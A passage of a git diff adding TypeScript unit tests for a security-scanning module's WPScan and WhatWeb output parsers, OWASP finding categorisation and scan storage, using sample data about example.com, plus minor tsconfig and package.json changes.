scan", async () => { + const scan: Omit = { + target: "http://example.com", + profile: "standard", + tools: [{ tool: "nikto", status: "completed", findingsCount: 5 }], + findings: ["finding_1", "finding_2"], + stats: { + urlsScanned: 10, + toolsRun: 1, + toolsFailed: 0, + findingsCount: 2, + criticalCount: 0, + highCount: 1, + mediumCount: 1, + lowCount: 0, + infoCount: 0, + duration: 5000, + }, + startedAt: Date.now(), + completedAt: Date.now(), + status: "completed", + } + + const saved = await WebScanStorage.saveScan(scan, { storage: "memory" }) + expect(saved.id).toMatch(/^scan_/) + + const retrieved = await WebScanStorage.getScan(saved.id, { storage: "memory" }) + expect(retrieved).not.toBeNull() + expect(retrieved!.profile).toBe("standard") + }) + }) +}) + +describe("WPScanParser", () => { + test("parses JSON output", () => { + const output = JSON.stringify({ + target_url: "http://wordpress.example.com", + version: { + number: "6.4.2", + status: "outdated", + vulnerabilities: [ + { + title: "WordPress < 6.5 - XSS Vulnerability", + fixed_in: "6.5", + references: { + cve: ["2024-1234"], + url: ["https://example.com/advisory"], + }, + cvss: { score: "6.1" }, + }, + ], + }, + plugins: { + "contact-form-7": { + version: { number: "5.8" }, + vulnerabilities: [], + }, + }, + users: { admin: { id: 1 }, editor: { id: 2 } }, + }) + + const result = WPScanParser.parse(output) + + expect(result.target).toBe("http://wordpress.example.com") + expect(result.version?.number).toBe("6.4.2") + expect(result.version?.vulnerabilities).toHaveLength(1) + expect(result.plugins?.["contact-form-7"]).toBeDefined() + expect(result.users).toContain("admin") + }) + + test("generates findings from vulnerabilities", () => { + const output = JSON.stringify({ + target_url: "http://wordpress.example.com", + version: { + number: "6.4.2", + vulnerabilities: [ + { + title: "Test Vulnerability", + fixed_in: "6.5", + cvss: { score: "7.5" }, + }, + ], + }, + }) + + const result = WPScanParser.parse(output) + const findings = WPScanParser.toFindings( + result, + "http://wordpress.example.com", + "session_test" + ) + + expect(findings).toHaveLength(1) + expect(findings[0].title).toBe("Test Vulnerability") + expect(findings[0].severity).toBe("high") // 7.5 CVSS = high + expect(findings[0].service).toBe("wordpress") + }) + + test("formats result for display", () => { + const output = JSON.stringify({ + target_url: "http://wordpress.example.com", + version: { number: "6.4.2", status: "latest" }, + plugins: { "akismet": { version: { number: "5.3" } } }, + }) + + const result = WPScanParser.parse(output) + const formatted = WPScanParser.format(result) + + expect(formatted).toContain("WordPress Version: 6.4.2") + expect(formatted).toContain("akismet") + }) + + test("summarizes result", () => { + const output = JSON.stringify({ + target_url: "http://wordpress.example.com", + version: { number: "6.4.2", vulnerabilities: [{}, {}] }, + plugins: { a: {}, b: {} }, + users: ["admin"], + }) + + const result = WPScanParser.parse(output) + const summary = WPScanParser.summarize(result) + + expect(summary).toContain("WordPress 6.4.2") + expect(summary).toContain("2 plugins") + expect(summary).toContain("2 vulnerabilities") + expect(summary).toContain("1 users") + }) +}) + +describe("WhatWebParser", () => { + test("parses JSON output", () => { + const output = JSON.stringify([ + { + target: "http://example.com", + http_status: 200, + plugins: { + Apache: { version: ["2.4.52"] }, + PHP: { version: ["8.1.2"] }, + WordPress: { version: ["6.4"] }, + HTTPServer: { string: ["Apache/2.4.52"] }, + }, + }, + ]) + + const results = WhatWebParser.parse(output) + + expect(results).toHaveLength(1) + expect(results[0].target).toBe("http://example.com") + expect(results[0].httpStatus).toBe(200) + expect(results[0].technologies.some((t) => t.name === "Apache")).toBe(true) + expect(results[0].technologies.some((t) => t.name === "PHP")).toBe(true) + }) + + test("parses text output fallback", () => { + const output = `http://example.com [200] Apache[2.4.52], PHP[8.1.2], WordPress[6.4]` + + const results = WhatWebParser.parseText(output) + + expect(results).toHaveLength(1) + expect(results[0].target).toBe("http://example.com") + expect(results[0].httpStatus).toBe(200) + expect(results[0].technologies.some((t) => t.name === "Apache")).toBe(true) + }) + + test("generates findings for outdated jQuery", () => { + const output = JSON.stringify([ + { + target: "http://example.com", + http_status: 200, + plugins: { + jQuery: { version: ["1.12.4"] }, + }, + }, + ]) + + const results = WhatWebParser.parse(output) + const findings = WhatWebParser.toFindings(results[0], "http://example.com", "session_test") + + const jqueryFinding = findings.find((f) => f.title.includes("jQuery")) + expect(jqueryFinding).toBeDefined() + expect(jqueryFinding!.severity).toBe("medium") + }) + + test("formats result for display", () => { + const output = JSON.stringify([ + { + target: "http://example.com", + http_status: 200, + plugins: { + Apache: { version: ["2.4.52"] }, + PHP: { version: ["8.1.2"] }, + }, + }, + ]) + + const results = WhatWebParser.parse(output) + const formatted = WhatWebParser.format(results[0]) + + expect(formatted).toContain("http://example.com") + expect(formatted).toContain("HTTP Status: 200") + expect(formatted).toContain("Apache") + expect(formatted).toContain("PHP") + }) +}) + +describe("OwaspCategorization", () => { + test("categorizes injection findings", () => { + const finding: PentestTypes.Finding = { + id: "finding_1", + sessionID: "session_1", + title: "SQL Injection in login form", + description: "The login form is vulnerable to SQL injection attacks allowing SQLi and command injection", + severity: "critical", + status: "open", + target: "http://example.com", + createdAt: Date.now(), + } + + const result = OwaspCategorization.categorizeFinding(finding) + + expect(result.category).toBe("A03:2021-Injection") + expect(result.confidence).toBe("high") // 3+ matches: sql injection pattern, sqli keyword, command keyword, injection keyword + }) + + test("categorizes XSS as injection", () => { + const finding: PentestTypes.Finding = { + id: "finding_2", + sessionID: "session_1", + title: "Cross-Site Scripting (XSS)", + description: "Reflected XSS in search parameter", + severity: "high", + status: "open", + target: "http://example.com", + createdAt: Date.now(), + } + + const result = OwaspCategorization.categorizeFinding(finding) + + expect(result.category).toBe("A03:2021-Injection") + }) + + test("categorizes SSL issues as cryptographic failures", () => { + const finding: PentestTypes.Finding = { + id: "finding_3", + sessionID: "session_1", + title: "Weak SSL/TLS Configuration", + description: "Server supports weak cipher suites", + severity: "medium", + status: "open", + target: "http://example.com", + createdAt: Date.now(), + } + + const result = OwaspCategorization.categorizeFinding(finding) + + expect(result.category).toBe("A02:2021-Cryptographic_Failures") + }) + + test("categorizes path traversal as broken access control", () => { + const finding: PentestTypes.Finding = { + id: "finding_4", + sessionID: "session_1", + title: "Path Traversal Vulnerability", + description: "File parameter allows path traversal", + severity: "high", + status: "open", + target: "http://example.com", + createdAt: Date.now(), + } + + const result = OwaspCategorization.categorizeFinding(finding) + + expect(result.category).toBe("A01:2021-Broken_Access_Control") + }) + + test("categorizes CVE findings as vulnerable components", () => { + const finding: PentestTypes.Finding = { + id: "finding_5", + sessionID: "session_1", + title: "Apache Struts RCE", + description: "Remote code execution vulnerability", + severity: "critical", + status: "open", + target: "http://example.com", + cve: ["CVE-2017-5638"], + createdAt: Date.now(), + } + + const result = OwaspCategorization.categorizeFinding(finding) + + expect(result.category).toBe("A06:2021-Vulnerable_and_Outdated_Components") + expect(result.confidence).toBe("high") + }) + + test("categorizes SSRF correctly", () => { + const finding: PentestTypes.Finding = { + id: "finding_6", + sessionID: "session_1", + title: "Server-Side Request Forgery", + description: "SSRF allows access to internal services", + severity: "high", + status: "open", + target: "http://example.com", + createdAt: Date.now(), + } + + const result = OwaspCategorization.categorizeFinding(finding) + + expect(result.category).toBe("A10:2021-Server-Side_Request_Forgery") + }) + + test("marks uncategorizable findings", () => { + const finding: PentestTypes.Finding = { + id: "finding_7", + sessionID: "session_1", + title: "Information Disclosure", + description: "Server returns detailed stack traces", + severity: "low", + status: "open", + target: "http://example.com", + createdAt: Date.now(), + } + + const result = OwaspCategorization.categorizeFinding(finding) + + // Should match A05 Security Misconfiguration + expect(result.category).toBe("A05:2021-Security_Misconfiguration") + }) + + test("getCategoryName returns human readable names", () => { + expect(OwaspCategorization.getCategoryName("A01:2021-Broken_Access_Control")).toBe("Broken Access Control") + expect(OwaspCategorization.getCategoryName("A03:2021-Injection")).toBe("Injection") + expect(OwaspCategorization.getCategoryName("Uncategorized")).toBe("Uncategorized") + }) +}) + +describe("WebScanTypes", () => { + test("validates CrawlOptions", () => { + const valid = WebScanTypes.CrawlOptions.parse({ + maxDepth: 3, + maxUrls: 500, + }) + + expect(valid.maxDepth).toBe(3) + expect(valid.maxUrls).toBe(500) + expect(valid.delay).toBe(100) // Default + expect(valid.followRedirects).toBe(true) // Default + }) + + test("validates ScanProfile", () => { + const valid = WebScanTypes.ScanProfile.parse({ + id: "custom", + name: "Custom Profile", + description: "Test profile", + crawl: { + enabled: true, + maxDepth: 2, + maxUrls: 100, + }, + tools: ["nikto", "nuclei"], + }) + + expect(valid.id).toBe("custom") + expect(valid.tools).toHaveLength(2) + }) + + test("validates OwaspCategory enum", () => { + const valid = WebScanTypes.OwaspCategory.parse("A03:2021-Injection") + expect(valid).toBe("A03:2021-Injection") + + expect(() => WebScanTypes.OwaspCategory.parse("Invalid")).toThrow() + }) +}) diff --git a/packages/opencode/tsconfig.json b/packages/opencode/tsconfig.json index 9067d84fd6a..31acfc5ceff 100644 --- a/packages/opencode/tsconfig.json +++ b/packages/opencode/tsconfig.json @@ -12,5 +12,6 @@ "@/*": ["./src/*"], "@tui/*": ["./src/cli/cmd/tui/*"] } - } + }, + "exclude": ["src/dashboard"] } diff --git a/packages/web/package.json b/packages/web/package.json index 3dd95ef1849..7927fcaf215 100644 --- a/packages/web/package.json +++ b/packages/web/package.json @@ -34,7 +34,7 @@ "toolbeam-docs-theme": "0.4.8" }, "devDependencies": { - "opencode": "workspace:*", + "cyxwiz": "workspace:*", "@types/node": "catalog:", "typescript": "catalog:" }